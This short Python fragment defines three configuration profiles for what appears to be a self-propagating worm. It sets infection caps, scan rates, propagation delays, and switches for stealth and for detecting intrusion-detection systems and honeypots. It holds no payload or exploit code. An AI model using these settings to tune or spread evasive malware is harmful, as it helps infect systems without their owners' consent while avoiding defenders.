CONFIG_PROFILES = {
    "stealth": {
        "propagation_delay": 10.0,
        "max_infections": 10,
        "stealth_mode": True,
        "randomize_timing": True,
        "max_scan_rate": 10,
        "detect_ids": True,
        "detect_honeypots": True,
        "max_runtime_hours": 8,
        "use_pretrained": True,
    },
    "aggressive": {
        "propagation_delay": 0.5,
        "max_infections": 100,
        "stealth_mode": False,
        "randomize_timing": False,
        "max_scan_rate": 500,
        "detect_ids": False,
        "detect_honeypots": False,
        "max_runtime_hours": 2,
        "use_pretrained": False,
    },
    "audit": {
        "propagation_delay": 3.0,
        "max_infections": 50,
        "stealth_mode": True,
        "randomize_timing": True,
        "max_scan_rate": 50,
        "detect_ids": True,
        "detect_honeypots": True,
        "max_runtime_hours": 4,
        "use_pretrained": True,
        "enable_logging": True,
        "log_encryption": True,
    },
}
